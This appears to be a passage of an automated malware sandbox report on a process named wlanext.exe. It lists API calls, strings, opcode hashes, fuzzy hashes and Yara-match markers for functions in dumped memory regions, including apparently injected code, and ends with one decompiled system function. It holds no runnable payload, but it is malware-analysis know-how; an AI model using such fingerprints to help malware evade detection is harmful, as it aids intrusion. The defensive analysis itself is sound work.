                                                                                        • Opcode ID: 137f7e6be9bad67dd872967e8e0ffa6150dcd60b3fbf7a54439cd12a7fb08fe4
                                                                                        • Instruction ID: 492a91d1e50fe7ec8a889d5211090f85cfb88d5250f70cdbe55b52fca4f1ede5
                                                                                        • Opcode Fuzzy Hash: 137f7e6be9bad67dd872967e8e0ffa6150dcd60b3fbf7a54439cd12a7fb08fe4
                                                                                        • Instruction Fuzzy Hash: DA31AEB5600604ABC714DFA4D8C5FA7B7F8EB48704F14C61EF65E9B285D7B0A940CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0017B4B4 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(000007D0), ref: 0017B57B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_160000_wlanext.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID: net.dll$wininet.dll
                                                                                        • API String ID: 3472027048-1269752229
                                                                                        • Opcode ID: b2d7e699f86fddb39e37bc3f3c9f0fdaf5696130a6fdc000ccd150db1d634999
                                                                                        • Instruction ID: 1df98c1ba6f633d47a9bab609766a91ace1665e6c084d4cab50e2233c33a0c27
                                                                                        • Opcode Fuzzy Hash: b2d7e699f86fddb39e37bc3f3c9f0fdaf5696130a6fdc000ccd150db1d634999
                                                                                        • Instruction Fuzzy Hash: D331E0B1A04205ABD714DFA4D8C5FAABBF8EF48700F10C26AE65D5B281D7706550CFE0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00174DDB Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 102COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000,00000000,001647A4,00000000), ref: 00174DF7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_160000_wlanext.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Initialize
                                                                                        • String ID: @J7<
                                                                                        • API String ID: 2538663250-2016760708
                                                                                        • Opcode ID: 85e715509f39b48628fe28623e47501f9bb5c7ad3bd5784915b75382be0380ba
                                                                                        • Instruction ID: 2c661a6e36fd314e2d432294ff7adf64f2299b4071d8d941eb90aa0c36068d42
                                                                                        • Opcode Fuzzy Hash: 85e715509f39b48628fe28623e47501f9bb5c7ad3bd5784915b75382be0380ba
                                                                                        • Instruction Fuzzy Hash: 983130B6A0060A9FDB00DFD8D8809EFB7B9FF88314B108559E509EB214D775EE45CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00174DE0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000,00000000,001647A4,00000000), ref: 00174DF7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_160000_wlanext.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Initialize
                                                                                        • String ID: @J7<
                                                                                        • API String ID: 2538663250-2016760708
                                                                                        • Opcode ID: 3567a2a1fe4541225f3be81fd4be6fb38494e8d5aadab1478d6b1c189090febc
                                                                                        • Instruction ID: 3ae15761910b545d22730688618311b36bd51c6a248c65d80169b6fed5a7fa8b
                                                                                        • Opcode Fuzzy Hash: 3567a2a1fe4541225f3be81fd4be6fb38494e8d5aadab1478d6b1c189090febc
                                                                                        • Instruction Fuzzy Hash: C13121B5A0060A9FDB00DFD8D8809EFB7B9BF88314B108559E509E7214D775EE458BA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001676F8 Relevance: 3.1, APIs: 2, Instructions: 57threadwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 0016775A
                                                                                        • PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 0016777B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_160000_wlanext.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID:
                                                                                        • API String ID: 1836367815-0
                                                                                        • Opcode ID: 4693707345acf24fc52b632aba3cc8192343b25f6e334905140fdbea078c5936
                                                                                        • Instruction ID: 2af1dc0cab93dcc57ff4e527d7912824e4278f8ddd53f57c1a3812688b01e2ce
                                                                                        • Opcode Fuzzy Hash: 4693707345acf24fc52b632aba3cc8192343b25f6e334905140fdbea078c5936
                                                                                        • Instruction Fuzzy Hash: A8012432A8022877EB21A6908C47FFE776CAF10B45F044018FF08FA1C1E794690687E6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00167700 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 0016775A
                                                                                        • PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 0016777B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_160000_wlanext.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID:
                                                                                        • API String ID: 1836367815-0
                                                                                        • Opcode ID: 86e3d2dfb82d5cf0c0ce6f969c10c22840c70a655e9af4f0ba6ee1b5e3fe2e6a
                                                                                        • Instruction ID: 9b815fbf00f52614c1da190b4d2c3f23d53d685331bc37ee084b04e811ef15f7
                                                                                        • Opcode Fuzzy Hash: 86e3d2dfb82d5cf0c0ce6f969c10c22840c70a655e9af4f0ba6ee1b5e3fe2e6a
                                                                                        • Instruction Fuzzy Hash: EB01A231A802287BEB21A6A48C43FFE776C9F54B55F144158FF08BA1C1E7D4690687F6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0016F8A0 Relevance: 1.7, APIs: 1, Instructions: 180COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 0016F988
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_160000_wlanext.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: 98baf61f3d42bd18c84b1bbbe3b668c4a29e1b5cc1b46eef9e978f941ec0b088
                                                                                        • Instruction ID: 669431114df35a7590f1eda576333323f98e33539c0625d089abd2f6158c73c7
                                                                                        • Opcode Fuzzy Hash: 98baf61f3d42bd18c84b1bbbe3b668c4a29e1b5cc1b46eef9e978f941ec0b088
                                                                                        • Instruction Fuzzy Hash: 8C5177B65002146BDB24DB94CC85FEB73BCEF58304F008A9DB65E97152EF30AB858B61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0016F89D Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 0016F988
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_160000_wlanext.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: 0dc34423b1465b9aa114328a2d418a7cc5bfd48a9225dc0a804826cd28777408
                                                                                        • Instruction ID: acc94e93d54d62c95c1486705d354b00625b765b5a2478de64b0d5f1788f4ea8
                                                                                        • Opcode Fuzzy Hash: 0dc34423b1465b9aa114328a2d418a7cc5bfd48a9225dc0a804826cd28777408
                                                                                        • Instruction Fuzzy Hash: 2F5157B65102146BDB24DB54CC85FEB73BCEF58304F008A99B65E97152EF30AB958B60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00167783 Relevance: 1.7, APIs: 1, Instructions: 166threadwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 0016777B
                                                                                          • Part of subcall function 00167700: PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 0016775A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_160000_wlanext.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID:
                                                                                        • API String ID: 1836367815-0
                                                                                        • Opcode ID: e1cb7f0f2f93002219189f9ed88eacdc931d2a67f1505658e804d692b446b14a
                                                                                        • Instruction ID: 3d72f2529a6863c59974c62385ecff5c859ac0e35624d1632ce9fd1f46746e9c
                                                                                        • Opcode Fuzzy Hash: e1cb7f0f2f93002219189f9ed88eacdc931d2a67f1505658e804d692b446b14a
                                                                                        • Instruction Fuzzy Hash: CC51A0B1A042099FDB25DF24DC89BEB77F8EB48308F10846DE55D97281DB70AA50CBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0016ACA0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0016AD12
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_160000_wlanext.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Load
                                                                                        • String ID:
                                                                                        • API String ID: 2234796835-0
                                                                                        • Opcode ID: b69180f9a1fc42f5ece30d713381e45914be3e31c3ae05bfe790bc91725e4840
                                                                                        • Instruction ID: 5c1885b9ec54cb09c53bf3b762f18e8f3fdd7f3bd9ad4d1538ec133185e74ec6
                                                                                        • Opcode Fuzzy Hash: b69180f9a1fc42f5ece30d713381e45914be3e31c3ae05bfe790bc91725e4840
                                                                                        • Instruction Fuzzy Hash: 90010CB5D0020DBBDB10EBE4DC42F9EB3B8AF54308F0081A5A909A7241F631EA15CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0016E1F1 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetErrorMode.KERNELBASE(00008003,?,0016896A,?), ref: 0016E1EB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_160000_wlanext.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorMode
                                                                                        • String ID:
                                                                                        • API String ID: 2340568224-0
                                                                                        • Opcode ID: c413ab2640f747044a2a951e0658bc3dc4c9861431180358c77ef1dc31b808dd
                                                                                        • Instruction ID: 117e7d8db44b7d032e2e08f839bc9d484cc8f819e682dda25bff74aa80426e0b
                                                                                        • Opcode Fuzzy Hash: c413ab2640f747044a2a951e0658bc3dc4c9861431180358c77ef1dc31b808dd
                                                                                        • Instruction Fuzzy Hash: AD0126728482452FE711ABA0AC94FAA7BBC9F6A314F0041C9E40C5A092D3706994C791
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0017B600 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,FED47CD3,00000000,00000000,?,?,?,FED47CD3,?), ref: 0017B63C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_160000_wlanext.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateThread
                                                                                        • String ID:
                                                                                        • API String ID: 2422867632-0
                                                                                        • Opcode ID: 651918881af385aa176d8d5d281796d6897110cd30706255d3efc038ea49de4e
                                                                                        • Instruction ID: 61fa35c4cbd222608d9d7fb908400226bb8c5475216feb070ccfa855146afae6
                                                                                        • Opcode Fuzzy Hash: 651918881af385aa176d8d5d281796d6897110cd30706255d3efc038ea49de4e
                                                                                        • Instruction Fuzzy Hash: 4DE0923338130437E32161A99C03FA7B39CDB90B31F140066FB0DEB2C1D695F90142A8
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0017CAF3 Relevance: 1.5, APIs: 1, Instructions: 27memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 0017CB2D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_160000_wlanext.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeHeap
                                                                                        • String ID:
                                                                                        • API String ID: 3298025750-0
                                                                                        • Opcode ID: 33ac012989b6b38b20fe75eae43b70e4167c2fec29589a974508570b9cbd4847
                                                                                        • Instruction ID: dfb02c1554762178bb5cd36ec4af93eea91d27d28ff8b88731ff79ca402c145b
                                                                                        • Opcode Fuzzy Hash: 33ac012989b6b38b20fe75eae43b70e4167c2fec29589a974508570b9cbd4847
                                                                                        • Instruction Fuzzy Hash: 89F039B5640208ABDB18EF49EC4AEAB77BCEF84350F108159F9095B251C630E918CBB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0016E3B0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNELBASE(00173DD2,?,?,00173DD2,00000000,?), ref: 0016E3DA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_160000_wlanext.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: e85c5d89da21b97cce867b66015c552d760b665465df6a454d9ae2b4307e753c
                                                                                        • Instruction ID: c1edcfdae96652fe02e488a60d29c22f3bec98d564b65e0c4ce35dc96fc77efb
                                                                                        • Opcode Fuzzy Hash: e85c5d89da21b97cce867b66015c552d760b665465df6a454d9ae2b4307e753c
                                                                                        • Instruction Fuzzy Hash: 2EE0867624020427FB2466A89C86F6E379C9B48724F184791F91CDF3D2D774F9518154
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0017CC5B Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0016DD12,0016DD12,?,00000000,?,?), ref: 0017CC90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_160000_wlanext.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LookupPrivilegeValue
                                                                                        • String ID:
                                                                                        • API String ID: 3899507212-0
                                                                                        • Opcode ID: 9524396d80443591eedf9a296ad2aefb63e2895d1038800b0b285120f173c4d2
                                                                                        • Instruction ID: f260165a37c6d18e9ef5230f3e82adfe2de12e38eb213a7197ca6c88cd8a91d6
                                                                                        • Opcode Fuzzy Hash: 9524396d80443591eedf9a296ad2aefb63e2895d1038800b0b285120f173c4d2
                                                                                        • Instruction Fuzzy Hash: 9AE01AB6610208ABDB10EF48DC45EE777ADEF88760F158154BA0D6B241C631E9158AE1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0017CAC0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00176AB6,?,0017725D,0017725D,?,00176AB6,?,?,?,?,?,00000000,00000005,00000206), ref: 0017CAED
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_160000_wlanext.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
                                                                                        • Instruction ID: 00d36451c4a92d2c9a6d7259365ddca34d2ff481676bcc4d239fdc28c3a1dbd3
                                                                                        • Opcode Fuzzy Hash: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
                                                                                        • Instruction Fuzzy Hash: 43E046B1200208ABDB18EF99DC49EA737ACEF88754F018154FE0D6B242C630F914CAF0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0017CB00 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 0017CB2D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_160000_wlanext.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeHeap
                                                                                        • String ID:
                                                                                        • API String ID: 3298025750-0
                                                                                        • Opcode ID: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
                                                                                        • Instruction ID: c252194b058360dcd9c938701896adaf9f7708d2fccb41985a6baed606ab3d22
                                                                                        • Opcode Fuzzy Hash: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
                                                                                        • Instruction Fuzzy Hash: 43E012B1200208ABDB14EF89DC49EA737ACEF88750F018154BA096B242CA30F9148AB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0017CC60 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0016DD12,0016DD12,?,00000000,?,?), ref: 0017CC90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_160000_wlanext.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LookupPrivilegeValue
                                                                                        • String ID:
                                                                                        • API String ID: 3899507212-0
                                                                                        • Opcode ID: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
                                                                                        • Instruction ID: 4c8040d52f31ff9cd0468897b4389e8244ab4a8cd5c09923be57e19edda52182
                                                                                        • Opcode Fuzzy Hash: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
                                                                                        • Instruction Fuzzy Hash: 8FE01AB1200208ABD710DF49DC45EE737ADEF88750F118154BA0D67241C630F8148AB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0016E1B7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetErrorMode.KERNELBASE(00008003,?,0016896A,?), ref: 0016E1EB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_160000_wlanext.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorMode
                                                                                        • String ID:
                                                                                        • API String ID: 2340568224-0
                                                                                        • Opcode ID: 3e1d70113e8024e387dd58facff138ed0df3399af232bd992191495ef34f2507
                                                                                        • Instruction ID: da61da4774d9b167a8dcc327f06772ff2020f8e05041b1e9316e33d2c32ee24a
                                                                                        • Opcode Fuzzy Hash: 3e1d70113e8024e387dd58facff138ed0df3399af232bd992191495ef34f2507
                                                                                        • Instruction Fuzzy Hash: 13E0C272A503002AF710D6F08C06F6927A4EB54A40F094164F809D63C3EA61D5014510
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0017CA86 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00176AB6,?,0017725D,0017725D,?,00176AB6,?,?,?,?,?,00000000,00000005,00000206), ref: 0017CAED
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_160000_wlanext.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: 92e92f4788ccf9663bab056ccdb88cd0e8858e727fc4433ec8aa42c606b0010d
                                                                                        • Instruction ID: 359f9ed80afd6385779327d03cca216b9c291ed17184f3d0c5a8614dfb23164b
                                                                                        • Opcode Fuzzy Hash: 92e92f4788ccf9663bab056ccdb88cd0e8858e727fc4433ec8aa42c606b0010d
                                                                                        • Instruction Fuzzy Hash: C9D017B6100128ABDB14EF58EC48CA73378EF84314B058559F80DA3202D631E8158AB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0016E1C0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetErrorMode.KERNELBASE(00008003,?,0016896A,?), ref: 0016E1EB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_160000_wlanext.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorMode
                                                                                        • String ID:
                                                                                        • API String ID: 2340568224-0
                                                                                        • Opcode ID: a6af6de4e270644dad7696f4b4583ad4cc9431b529bd1eccbba34c18680ed16a
                                                                                        • Instruction ID: 8cce6a24b90f05ae45dd87451542f972c8498d8658a4e31122bfb7cf37c45b77
                                                                                        • Opcode Fuzzy Hash: a6af6de4e270644dad7696f4b4583ad4cc9431b529bd1eccbba34c18680ed16a
                                                                                        • Instruction Fuzzy Hash: 49D0A77164030437F710E6E48C07F2632CC9B48B44F0540A0F90DD73C3DA60F5014564
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C2967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.572246911.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.572817614.0000000000CDB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.572830036.0000000000CDF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_bc0000_wlanext.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 92d765e45ef9172e1cb371890a07baa50a885de1fd7e1832217736131eacab25
                                                                                        • Instruction ID: a1fc24d8c54534ab95df6faf151f12cee720e17ac1feecf144922d6758bc047a
                                                                                        • Opcode Fuzzy Hash: 92d765e45ef9172e1cb371890a07baa50a885de1fd7e1832217736131eacab25
                                                                                        • Instruction Fuzzy Hash: 24B09BB19114D5C9DB51D76066087177A50B7D0741F26C071E1130681A4778C595F5B5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Non-executed Functions

                                                                                        Function 00C7FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 53%
                                                                                        			E00C7FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00C2CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00C75720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00C75720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                        0x00c7fdda
                                                                                        0x00c7fde2
                                                                                        0x00c7fde5
                                                                                        0x00c7fdec
                                                                                        0x00c7fdfa
                                                                                        0x00c7fdff
                                                                                        0x00c7fe0a
                                                                                        0x00c7fe0f
                                                                                        0x00c7fe17
                                                                                        0x00c7fe1e
                                                                                        0x00c7fe19
                                                                                        0x00c7fe19
                                                                                        0x00c7fe19
                                                                                        0x00c7fe20
                                                                                        0x00c7fe21
                                                                                        0x00c7fe22
                                                                                        0x00c7fe25
                                                                                        0x00c7fe40

                                                                                        APIs
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C7FDFA
                                                                                        Strings
                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00C7FE2B
                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00C7FE01
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.572246911.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.572817614.0000000000CDB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.572830036.0000000000CDF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
